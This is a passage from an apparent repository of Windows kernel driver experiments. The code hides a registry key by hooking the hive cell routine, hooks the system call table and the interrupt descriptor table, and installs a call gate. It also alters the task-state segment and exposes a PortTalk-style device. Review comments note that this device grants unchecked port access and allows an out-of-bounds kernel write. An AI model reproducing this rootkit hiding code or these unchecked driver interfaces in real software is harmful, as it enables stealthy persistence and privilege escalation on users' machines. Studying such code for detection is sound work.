failed\n"); 70 | return NULL; 71 | } 72 | return hKey; 73 | } 74 | 75 | PVOID GetKeyControlBlock(HANDLE hKey) 76 | { 77 | NTSTATUS status; 78 | PCM_KEY_BODY KeyBody; 79 | PVOID kcb; 80 | 81 | if (hKey == NULL) 82 | return NULL; 83 | 84 | status = ObReferenceObjectByHandle(hKey, 85 | KEY_READ, 86 | NULL, 87 | KernelMode, 88 | &KeyBody, 89 | NULL); 90 | if (status != STATUS_SUCCESS) 91 | { 92 | DbgPrint("ObreferencedObjectByHandle Failed\n"); 93 | return NULL; 94 | } 95 | 96 | kcb = KeyBody->KeyControlBlock; 97 | ObDereferenceObject(KeyBody); 98 | return kcb; 99 | } 100 | 101 | PVOID GetLastKeyNode(PVOID 
Hive, PCM_KEY_NODE Node) 102 | { 103 | PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent); 104 | PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]); 105 | 106 | DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index); 107 | 108 | if (Index->Signature == CM_KEY_INDEX_ROOT) 109 | { 110 | Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count - 1]); 111 | DbgPrint("Index = %lx\n", Index); 112 | } 113 | 114 | if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF) 115 | { 116 | return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]); 117 | } 118 | else 119 | { 120 | return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]); 121 | } 122 | } 123 | 124 | PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell) 125 | { 126 | PVOID pRet = g_pGetCellRoutine(Hive, Cell); 127 | if (pRet) 128 | { 129 | if (pRet == g_HideNode) 130 | { 131 | DbgPrint("GetCellRoutine(%lx, %08lx) == %lx\n", Hive, Cell, pRet); 132 | pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode); 133 | DbgPrint("g_LastNode = %lx\n", g_LastNode); 134 | if (pRet == g_HideNode) pRet = NULL; 135 | } 136 | else if (pRet == g_LastNode) 137 | { 138 | DbgPrint("GetCellRoutine(%lx, %08lx) == %lx\n", Hive, Cell, pRet); 139 | pRet = g_LastNode = NULL; 140 | } 141 | } 142 | return pRet; 143 | } 144 | 145 | NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj) 146 | { 147 | DbgPrint("DriverUnload()\n"); 148 | if (g_ppGetCellRoutine) 149 | *g_ppGetCellRoutine = g_pGetCellRoutine; 150 | return STATUS_SUCCESS; 151 | } 152 | 153 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath) 154 | { 155 | ULONG BuildNumber; 156 | ULONG KeyHiveOffset; // KeyControlBlock->KeyHive 157 | ULONG KeyCellOffset; // KeyControlBlock->KeyCell 158 | HANDLE hKey; 159 | PVOID KCB, Hive; 160 | 161 | DbgPrint("DriverEntry()\n"); 162 | pDrvObj->DriverUnload = DriverUnload; 163 | 164 | if (PsGetVersion(NULL, NULL, 
&BuildNumber, NULL)) 165 | return STATUS_NOT_SUPPORTED; 166 | DbgPrint("BuildNumber = %d\n", BuildNumber); 167 | 168 | switch (BuildNumber) 169 | { 170 | case 2195: // Win2000 171 | KeyHiveOffset = 0xc; 172 | KeyCellOffset = 0x10; 173 | break; 174 | case 2600: // WinXP 175 | case 3790: // Win2003 176 | KeyHiveOffset = 0x10; 177 | KeyCellOffset = 0x14; 178 | break; 179 | default: 180 | return STATUS_NOT_SUPPORTED; 181 | } 182 | 183 | 184 | hKey = OpenKeyByName(g_HideKeyName); 185 | KCB = GetKeyControlBlock(hKey); 186 | if (KCB) 187 | { 188 | PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive); 189 | g_ppGetCellRoutine = &Hive->GetCellRoutine; 190 | g_pGetCellRoutine = Hive->GetCellRoutine; 191 | DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine); 192 | g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell)); 193 | Hive->GetCellRoutine = MyGetCellRoutine; 194 | } 195 | ZwClose(hKey); 196 | 197 | return STATUS_SUCCESS; 198 | } 199 | -------------------------------------------------------------------------------- /HookNtCreateSectionProtectProcess.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/HookNtCreateSectionProtectProcess.c -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | typedef unsigned int DWORD; 4 | typedef unsigned short WORD; 5 | typedef unsigned char BYTE; 6 | typedef DWORD* PDWORD; 7 | typedef BYTE* PBYTE; 8 | typedef WORD* PWORD; 9 | 10 | PVOID* NewSystemCallTable; 11 | PMDL MyMDL; 12 | 13 | #define INDEX(func) *(PULONG)((PUCHAR)func + 1) 14 | #define HOOK(func, newfunc, old) \ 15 | old = (PVOID)InterlockedExchange( (PULONG)&NewSystemCallTable[INDEX(func)], (ULONG)newfunc) 16 | #define UNHOOK(func, old) \ 17 | InterlockedExchange( 
(PULONG)&NewSystemCallTable[INDEX(func)], (ULONG)old) 18 | 19 | #pragma pack(1) 20 | typedef struct _KeServiceDescriptorEntry { 21 | PDWORD ServiceTableEntry; 22 | PDWORD ServiceCounterTableBase; 23 | DWORD NumberOfServices; 24 | PBYTE ParamTableBase; 25 | } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; 26 | #pragma pack() 27 | __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; 28 | 29 | typedef struct _FILE_BOTH_DIR_INFORMATION { 30 | ULONG NextEntryOffset; 31 | ULONG FileIndex; 32 | LARGE_INTEGER CreationTime; 33 | LARGE_INTEGER LastAccessTime; 34 | LARGE_INTEGER LastWriteTime; 35 | LARGE_INTEGER ChangeTime; 36 | LARGE_INTEGER EndOfFile; 37 | LARGE_INTEGER AllocationSize; 38 | ULONG FileAttributes; 39 | ULONG FileNameLength; 40 | ULONG EaSize; 41 | CCHAR ShortNameLength; 42 | WCHAR ShortName[12]; 43 | WCHAR FileName[1]; 44 | } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; 45 | 46 | NTSYSAPI 47 | NTSTATUS 48 | NTAPI ZwQueryDirectoryFile( 49 | IN HANDLE FileHandle, 50 | IN HANDLE Event OPTIONAL, 51 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 52 | IN PVOID ApcContext OPTIONAL, 53 | OUT PIO_STATUS_BLOCK IoStatusBlock, 54 | OUT PVOID FileInformation, 55 | IN ULONG Length, 56 | IN FILE_INFORMATION_CLASS FileInformationClass, 57 | IN BOOLEAN ReturnSingleEntry, 58 | IN PUNICODE_STRING FileName OPTIONAL, 59 | IN BOOLEAN RestartScan 60 | ); 61 | 62 | typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)( 63 | IN HANDLE FileHandle, 64 | IN HANDLE Event OPTIONAL, 65 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 66 | IN PVOID ApcContext OPTIONAL, 67 | OUT PIO_STATUS_BLOCK IoStatusBlock, 68 | OUT PVOID FileInformation, 69 | IN ULONG Length, 70 | IN FILE_INFORMATION_CLASS FileInformationClass, 71 | IN BOOLEAN ReturnSingleEntry, 72 | IN PUNICODE_STRING FileName OPTIONAL, 73 | IN BOOLEAN RestartScan 74 | ); 75 | 76 | ZWQUERYDIRECTORYFILE OldZwQueryFileDirectoryFile; 77 | 78 | NTSTATUS NewZwQueryDirectoryFile( 79 | IN HANDLE FileHandle, 80 | IN 
HANDLE Event OPTIONAL, 81 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 82 | IN PVOID ApcContext OPTIONAL, 83 | OUT PIO_STATUS_BLOCK IoStatusBlock, 84 | OUT PVOID FileInformation, 85 | IN ULONG Length, 86 | IN FILE_INFORMATION_CLASS FileInformationClass, 87 | IN BOOLEAN ReturnSingleEntry, 88 | IN PUNICODE_STRING FileName OPTIONAL, 89 | IN BOOLEAN RestartScan 90 | ) 91 | { 92 | DbgPrint("New called %wZ!\n", FileName); 93 | return OldZwQueryFileDirectoryFile( 94 | FileHandle, 95 | Event, 96 | ApcRoutine, 97 | ApcContext, 98 | IoStatusBlock, 99 | FileInformation, 100 | Length, 101 | FileInformationClass, 102 | ReturnSingleEntry, 103 | FileName, 104 | RestartScan); 105 | } 106 | 107 | NTSTATUS Hook() 108 | { 109 | MyMDL = MmCreateMdl( 110 | NULL, 111 | KeServiceDescriptorTable.ServiceTableEntry, 112 | KeServiceDescriptorTable.NumberOfServices * 4); 113 | if (MyMDL == NULL) 114 | return STATUS_UNSUCCESSFUL; 115 | 116 | MmBuildMdlForNonPagedPool(MyMDL); 117 | MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA; 118 | NewSystemCallTable = MmMapLockedPages(MyMDL, KernelMode); 119 | if (!NewSystemCallTable) 120 | return STATUS_UNSUCCESSFUL; 121 | 122 | HOOK(ZwQueryDirectoryFile, NewZwQueryDirectoryFile, OldZwQueryFileDirectoryFile); 123 | return STATUS_SUCCESS; 124 | } 125 | 126 | NTSTATUS Unhook() 127 | { 128 | if (NewSystemCallTable) 129 | { 130 | UNHOOK(ZwQueryDirectoryFile, OldZwQueryFileDirectoryFile); 131 | MmUnmapLockedPages(NewSystemCallTable, MyMDL); 132 | IoFreeMdl(MyMDL); 133 | } 134 | return STATUS_SUCCESS; 135 | } 136 | 137 | NTSTATUS Unload(PDRIVER_OBJECT driver) 138 | { 139 | NTSTATUS status; 140 | DbgPrint("Unload!\n"); 141 | return Unhook(); 142 | } 143 | 144 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 145 | { 146 | DbgPrint("DriverEntry!\n"); 147 | driver->DriverUnload = Unload; 148 | Hook(); 149 | return STATUS_SUCCESS; 150 | } -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/makefile: 
-------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/objfre_wxp_x86/i386/main.obj.oacr.root.x86fre.pft.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 4 | 0 5 | 10920main.cc:\project\drivers\hookzwquerydirectoryfile\28159Consider using 'IoAllocateMdl' instead of 'MmCreateMdl'. Reason: Obsolete.Hook107 6 | 11838main.cc:\project\drivers\hookzwquerydirectoryfile\28159Consider using 'MmMapLockedPagesSpecifyCache' instead of 'MmMapLockedPages'. Reason: Obsolete except on Windows 98. Use MmGetSystemAddressForMdlSafe if this is a call to MmGetSystemAddressForMdl..Hook107 7 | 1178main.cc:\project\drivers\hookzwquerydirectoryfile\28145The opaque MDL structure should not be modified by a driver.Hook107 8 | 1449main.cc:\project\drivers\hookzwquerydirectoryfile\28101The Drivers module has inferred that the current function is a DRIVER_INITIALIZE function: This is informational only. 
No problem has been detected.DriverEntry144 9 | 14722main.cc:\project\drivers\hookzwquerydirectoryfile\28155The function being assigned or passed should be a DRIVER_UNLOAD function: Add the declaration 'DRIVER_UNLOAD Unload;' before the current first declaration of Unload.DriverEntry144 10 | 11 | -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=HookZwQueryDirectoryFile 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IDTCALL/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | 5 | #define IDT_LIMIT (0xff * 8) 6 | #define GATE_TYPE 0xEE 7 | 8 | typedef unsigned int DWORD; 9 | typedef unsigned char BYTE; 10 | typedef unsigned short WORD; 11 | 12 | char outString[] = "abcdefg"; 13 | 14 | int now; 15 | typedef struct _IDTGATE { 16 | WORD offsetl; 17 | WORD selector; 18 | BYTE count; 19 | BYTE type; 20 | WORD offseth; 21 | } IDTGATE, *PIDTGATE; 22 | 23 | 24 | __declspec(naked) void MyCALLGATE() 25 | { 26 | __asm { 27 | cli; 28 | pushad; 29 | pushfd; 30 | mov eax, offset outString; 31 | push eax; 32 | mov eax, 80528e92h; 33 | call eax; 34 | pop eax; 35 | popfd; 36 | popad; 37 | sti; 38 | iretd; 39 | } 40 | } 41 | 42 | NTSTATUS AddCallGate(DWORD MyCALLGATE) 43 | { 44 | char s[256]; 45 | char idt[6]; 46 | DWORD base; 47 | PIDTGATE pCallGate = NULL; 48 | 49 | now = 0; 50 | 51 | _asm sidt idt; 52 | base = *(DWORD*)(idt + 2); 53 | 54 | while (now < IDT_LIMIT) 55 | { 56 | pCallGate = (PIDTGATE)(base + now); 57 | if ((pCallGate->type & 0x80) == 0) 58 | { 59 | 
_snprintf(s, 256, "%08x\n", now/8); 60 | DbgPrint(s); 61 | pCallGate->type = GATE_TYPE; 62 | pCallGate->offsetl = (WORD)((DWORD)MyCALLGATE & 0xFFFF); 63 | pCallGate->selector = 0x08; 64 | pCallGate->offseth = (WORD)((DWORD)MyCALLGATE >> 16); 65 | pCallGate->count = 0; 66 | DbgPrint("Add IDT gate!\n"); 67 | break; 68 | } 69 | now += 8; 70 | } 71 | 72 | return STATUS_SUCCESS; 73 | } 74 | 75 | void Unload(PDRIVER_OBJECT driver) 76 | { 77 | char idt[6]; 78 | DWORD base; 79 | PIDTGATE pCallGate = NULL; 80 | 81 | _asm sidt idt; 82 | 83 | base = *(DWORD*)(idt + 2); 84 | pCallGate = (PIDTGATE)(base + now); 85 | pCallGate->type = 0; 86 | DbgPrint("Unload!\n"); 87 | } 88 | 89 | NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg) 90 | { 91 | AddCallGate((DWORD)MyCALLGATE); 92 | driver->DriverUnload = Unload; 93 | return STATUS_SUCCESS; 94 | } -------------------------------------------------------------------------------- /IDTCALL/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IDTCALL/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IDTCALL 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /IDTHook/IDTHook.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | typedef unsigned short WORD; 5 | typedef unsigned long ULONG, DWORD; 6 | typedef unsigned char BYTE; 7 | 8 | typedef struct _IDTINFO 9 | { 10 | WORD IDTLimit; 11 | WORD LowIDTBase; 12 | WORD HiIDTBase; 13 | } IDTINFO; 14 | 15 | #define MAKELONG(a,b) ((DWORD) (((WORD) (a)) | (((DWORD) ((WORD) (b))) << 16))) 16 | 17 | #pragma pack(1) 18 | typedef struct _IDTENTRY 19 | { 20 | WORD LowOffset; 21 | WORD selector; 22 | BYTE unused_lo; 23 | unsigned char unused_hi:5; 24 | unsigned char DPL:2; 25 | unsigned char P:1; 26 | WORD HiOffset; 27 | } IDTENTRY; 28 | #pragma pack() 29 | 30 | IDTINFO IdtInfo; 31 | IDTENTRY *IdtEntries; 32 | DWORD old[256]; 33 | DWORD count[256]; 34 | BYTE* tables; 35 | 36 | #define MIN_IDT 0 37 | #define MAX_IDT 0xFF 38 | 39 | char template[] = { 40 | 0x90, //nop, debug 41 | 0x60, //pushad 42 | 0x9C, //pushfd 43 | 0xB8, 0xAA, 0x00, 0x00, 0x00, //mov eax, AAh 44 | 0x50, //push eax 45 | 0x9A, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00, //call 08:44332211h 46 | 0x58, //pop eax 47 | 0x9D, //popfd 48 | 0x61, //popad 49 | 0xEA, 0x11, 0x22, 0x33, 0x44, 0x08, 0x00 //jmp 08:44332211h 50 | }; 51 | 52 | void __stdcall NewISR(DWORD nouse) 53 | { 
54 | unsigned long *index; 55 | unsigned long i; 56 | 57 | __asm mov eax,[ebp+0Ch] 58 | __asm mov i, eax 59 | 60 | i = i & 0xFF; 61 | index = &count[i]; 62 | InterlockedIncrement(index); 63 | } 64 | 65 | void HookIDT() 66 | { 67 | int i, offset = 0; 68 | char* entry; 69 | for (i = MIN_IDT; i < MAX_IDT; i++) 70 | { 71 | old[i] = MAKELONG(IdtEntries[i].LowOffset, IdtEntries[i].HiOffset); 72 | entry = tables + offset; 73 | memcpy(entry, template, sizeof(template)); 74 | entry[4] = (BYTE)i; 75 | *((DWORD*)(&entry[10])) = (DWORD)NewISR; 76 | *((DWORD*)(&entry[20])) = (DWORD)old[i]; 77 | __asm cli 78 | IdtEntries[i].LowOffset = (WORD)entry; 79 | IdtEntries[i].HiOffset = (WORD)((DWORD)entry >> 16); 80 | __asm sti 81 | offset += sizeof(template); 82 | } 83 | } 84 | 85 | void UnHookIDT() 86 | { 87 | int i; 88 | char s[256]; 89 | for (i = MIN_IDT; i < MAX_IDT; i++) 90 | { 91 | __asm cli 92 | IdtEntries[i].LowOffset = (WORD)old[i]; 93 | IdtEntries[i].HiOffset = (WORD)(old[i]>> 16); 94 | __asm sti 95 | _snprintf(s, 256, "%d: %08x count: %d\n", i, old[i], count[i]); 96 | DbgPrint(s); 97 | } 98 | } 99 | 100 | VOID Unload(PDRIVER_OBJECT driver) 101 | { 102 | UnHookIDT(); 103 | ExFreePool(tables); 104 | } 105 | 106 | NTSTATUS DriverEntry( PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 107 | { 108 | _asm sidt IdtInfo 109 | IdtEntries = (IDTENTRY *)MAKELONG(IdtInfo.LowIDTBase, IdtInfo.HiIDTBase); 110 | tables = ExAllocatePool(NonPagedPool, sizeof(template)*256); 111 | HookIDT(); 112 | DbgPrint("DriverEntry success!\n"); 113 | driver->DriverUnload = Unload; 114 | return STATUS_SUCCESS; 115 | } 116 | -------------------------------------------------------------------------------- /IDTHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IDTHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=IDTHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=IDTHook.c 14 | -------------------------------------------------------------------------------- /IOMAP/IOMAP.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/IOMAP/IOMAP.suo -------------------------------------------------------------------------------- /IOMAP/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /IOMAP/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=IOMAP 2 | TARGETPATH=OBJ 3 | TARGETTYPE=DRIVER 4 | SOURCES=main.c -------------------------------------------------------------------------------- /IOMAP/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "string.h" 3 | 4 | #ifndef DWORD 5 | #define DWORD unsigned int 6 | #endif 7 | 8 | #ifndef WORD 9 | #define WORD unsigned short 10 | #endif 11 | 12 | /* Values SetIO() writes into the task-state-segment descriptor: IBUSY is the descriptor type forced before ltr, LIMIT/EXPAN are the two segment limits it toggles between. NOTE(review): neither value is derived from the running system and the original limit is never read back, so Unload() restores a constant rather than the pre-hook value. */ #define IBUSY 9 13 | #define LIMIT 0x20AB 14 | #define EXPAN 0x2FFF 15 | 16 | #pragma pack(1) /* GDTR exactly as sgdt stores it: 16-bit limit followed by the 32-bit linear base. */ 17 | typedef struct _GDTR { 18 | WORD Limit; 19 | DWORD *dwBase; 20 | } GDTR, *PGDTR; /* Bit-field view of one 8-byte GDT descriptor. Only dwLimit (the low 16 bits of the limit) and dwType are modified below; dwLimithi is left as found. */ 21 | typedef struct _GDTENTRY{ 22 | DWORD dwLimit : 16; 23 | DWORD dwBaselo : 16; 24 | DWORD dwBasemid : 8; 25 | DWORD dwType : 4; 26 | DWORD dwSystem : 1; 27 | DWORD dwDpl : 2; 28 | DWORD dwPresent : 1; 29 | DWORD dwLimithi : 4; 30 | DWORD dwAvailable : 1; 31 | DWORD dwZero : 1; 32 | DWORD dwSize : 1; 33 | DWORD dwGranularity : 1; 34 | DWORD dwBasehi : 8; 35 | } GDTENTRY, *PGDTENTRY; 36 | #pragma pack() 37 | 38 | /* Rewrites the GDT descriptor currently selected by the task register. vv != 0 sets the limit to EXPAN, vv == 0 sets it back to LIMIT; the type is then forced to IBUSY and TR is reloaded (presumably because ltr refuses a descriptor already marked busy — confirm against the CPU manual). NOTE(review): the TSS segment limit is what bounds the I/O permission bitmap the CPU consults, so raising it is a way of making an extended bitmap visible (architectural behaviour, not shown in this file); a defender auditing a machine would flag a TSS descriptor whose limit differs from the value the kernel installed at boot. cli/sti only mask interrupts on the current CPU, TSSSeg is used as a raw byte offset without masking its low selector bits and without checking it against gdtr.Limit. */ 39 | void SetIO(int vv) 40 | { 41 | GDTR gdtr; 42 | PGDTENTRY entry; 43 | WORD TSSSeg; 44 | 45 | /* entry = gdtr.dwBase + TR selector: the descriptor for the running task. */ __asm 46 | { 47 | cli; 48 | sgdt gdtr; 49 | str TSSSeg; 50 | movzx esi, TSSSeg; 51 | add esi, gdtr.dwBase; 52 | mov entry, esi 53 | } 54 | 55 | if (vv) 56 | { 57 | entry->dwLimit = EXPAN; 58 | } else 59 | { 60 | entry->dwLimit = LIMIT; 61 | } 62 | 63 | entry->dwType = IBUSY; 64 | /* Reload TR so the CPU picks up the modified descriptor. */ __asm 65 | { 66 | ltr TSSSeg; 67 | sti; 68 | } 69 | } 70 | 71 | /* Driver unload: puts the hard-coded LIMIT back (not the original limit, which was never saved). */ void Unload(PDRIVER_OBJECT driver) 72 | { 73 | SetIO(0); 74 | DbgPrint("Unload!\n"); 75 | } 76 | 77 | /* Expands the TSS limit on load and registers Unload; the driver creates no device object, so there is no user-mode interface. */ NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING 
szReg) 78 | { 79 | SetIO(1); 80 | driver->DriverUnload = Unload; 81 | DbgPrint("Entry!\n"); 82 | return STATUS_SUCCESS; 83 | } -------------------------------------------------------------------------------- /IOMAP2/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | /* IOPM: the 8 KiB I/O permission bitmap (one bit per port; the code fills it with 0xFF and calls that "turn off all access"). MyIOPM is the driver's working copy, allocated in DriverEntry. */ #define IOPM_SIZE 0x2000 4 | 5 | typedef UCHAR IOPM[IOPM_SIZE]; 6 | IOPM* MyIOPM = NULL; 7 | 8 | /* Kernel routines declared by hand because the DDK headers do not expose them. NOTE(review): PsLookupProcessByProcessId is re-declared here with a ULONG id although the DDK declares it with HANDLE — verify the redeclaration matches the export. */ void Ke386SetIoAccessMap(int, IOPM *); 9 | void Ke386QueryIoAccessMap(int, IOPM *); 10 | void Ke386IoSetAccessProcess(PEPROCESS, int); 11 | NTSTATUS PsLookupProcessByProcessId( 12 | IN ULONG ulProcId, 13 | OUT PEPROCESS* pEProcess 14 | ); 15 | 16 | /* IRP_MJ_CREATE: accept every open and complete the IRP. */ NTSTATUS Create(PDEVICE_OBJECT device, PIRP pIrp) 17 | { 18 | pIrp->IoStatus.Status = STATUS_SUCCESS; 19 | pIrp->IoStatus.Information = 0; 20 | IoCompleteRequest(pIrp, IO_NO_INCREMENT); 21 | return STATUS_SUCCESS; 22 | } 23 | 24 | /* IRP_MJ_DEVICE_CONTROL handler. Every code reads its operands directly from SystemBuffer through raw ULONG/USHORT/UCHAR overlays. NOTE(review): Parameters.DeviceIoControl.InputBufferLength/OutputBufferLength are never checked, so longBuffer[0], shortBuffer[0] and charBuffer[2] are read from whatever the caller supplied (SystemBuffer is presumably NULL when no buffer is passed); the IRP is never completed here — only Create calls IoCompleteRequest — so every device-control request is left pending; `a` and `b` are unused. With the cases below (arbitrary port I/O and an unbounded bitmap write driven by user data, reachable through a \DosDevices link) this has the shape of the "port talk" drivers that end up on vulnerable-driver block lists. */ NTSTATUS Dispatch(PDEVICE_OBJECT device, PIRP pIrp) 25 | { 26 | PIO_STACK_LOCATION irpsp; 27 | NTSTATUS status = STATUS_SUCCESS; 28 | PUCHAR charBuffer; 29 | PUSHORT shortBuffer; 30 | PULONG longBuffer; 31 | PVOID ioBuffer; 32 | 33 | USHORT offset; 34 | UCHAR value; 35 | 36 | int a, b; 37 | ULONG processID; 38 | PEPROCESS process; 39 | 40 | irpsp = IoGetCurrentIrpStackLocation(pIrp); 41 | ioBuffer = pIrp->AssociatedIrp.SystemBuffer; 42 | charBuffer = (PUCHAR)ioBuffer; 43 | shortBuffer = (PUSHORT)ioBuffer; 44 | longBuffer = (PULONG)ioBuffer; 45 | 46 | switch (irpsp->Parameters.DeviceIoControl.IoControlCode) 47 | { 48 | /* 0x04: install MyIOPM as the I/O map and enable it for the process whose id is in longBuffer[0]. NOTE(review): the lookup status is ignored — on failure `process` is uninitialized when passed to Ke386IoSetAccessProcess — and on success the process reference is never released. The *(*MyIOPM + 0x6F) print is a single bitmap byte dumped for debugging. */ case 0x04: 49 | DbgPrint("IOCTL: 0x04 - Set IOPM of ProcessID"); 50 | processID = longBuffer[0]; 51 | PsLookupProcessByProcessId(processID, &process); 52 | DbgPrint("Pointer to process is %08x\n", process); 53 | DbgPrint("Address = %08x\n", *(*MyIOPM + 0x6F)); 54 | Ke386SetIoAccessMap(1, MyIOPM); 55 | Ke386IoSetAccessProcess(process, 1); 56 | break; 57 | /* 0x08: read one byte from the port number in shortBuffer[0] and return it in charBuffer[0]. IoStatus.Information stays 0, so the caller is told nothing was written back. */ case 0x08: 58 | DbgPrint("IOCTL 0x08 - READ_PORT_UCHAR 0x%X", shortBuffer[0]); 59 | (UCHAR)value = 
READ_PORT_UCHAR((PUCHAR)shortBuffer[0]); 60 | DbgPrint("Value read : %X", value); 61 | charBuffer[0] = value; 62 | break; 63 | /* 0x0C: write charBuffer[2] to the port in shortBuffer[0]. NOTE(review): the format string has two %X conversions but only one argument. */ case 0x0C: 64 | DbgPrint("IOCTL 0x0C - WRITE_PORT_UCHAR(0x%X <- 0x%X)", shortBuffer[0]); 65 | WRITE_PORT_UCHAR((PUCHAR)shortBuffer[0], charBuffer[2]); 66 | break; 67 | /* 0x10: reset the working bitmap to all-ones (every port denied). Only the copy is changed; nothing re-applies it to the CPU here. */ case 0x10: 68 | DbgPrint("IOCTL 0x10 - RTLFillMemory (Turn off all access)"); 69 | RtlFillMemory(MyIOPM, sizeof(IOPM), 0xFF); 70 | break; 71 | /* 0x14: patch one byte of the working bitmap. NOTE(review): `offset` is a USHORT from the user buffer (up to 0xFFFF) while the bitmap is IOPM_SIZE (0x2000) bytes — there is no bounds check, so this is an out-of-bounds write past the allocation. The debug string still says 0x10, and the change is not re-applied with Ke386SetIoAccessMap. */ case 0x14: 72 | DbgPrint("IOCTL 0x10 - Set IO Permission Bitmap"); 73 | offset = shortBuffer[0]; 74 | value = charBuffer[2]; 75 | DbgPrint("Offset = %x, value = %x\n", offset, value); 76 | *(*MyIOPM + offset) = value; 77 | break; 78 | default: 79 | status = STATUS_UNSUCCESSFUL; 80 | } 81 | pIrp->IoStatus.Status = status; 82 | pIrp->IoStatus.Information = 0; 83 | return status; 84 | } 85 | 86 | /* Driver unload: frees the bitmap copy, then removes the DOS link and the device. NOTE(review): MyIOPM is not cleared after the free; whether the kernel still refers to the map installed by Ke386SetIoAccessMap is not visible here. */ void Unload(PDRIVER_OBJECT driver) 87 | { 88 | WCHAR DOSNameBuffer[] = L"\\DosDevices\\PortTalk"; 89 | UNICODE_STRING uniDosString; 90 | 91 | DbgPrint("Unload!\n"); 92 | if (MyIOPM) 93 | MmFreeNonCachedMemory(MyIOPM, sizeof(IOPM)); 94 | RtlInitUnicodeString(&uniDosString, DOSNameBuffer); 95 | IoDeleteSymbolicLink(&uniDosString); 96 | IoDeleteDevice(driver->DeviceObject); 97 | } 98 | 99 | /* Allocates the bitmap (initially all ports denied), creates \Device\PortTalk with its \DosDevices link and wires 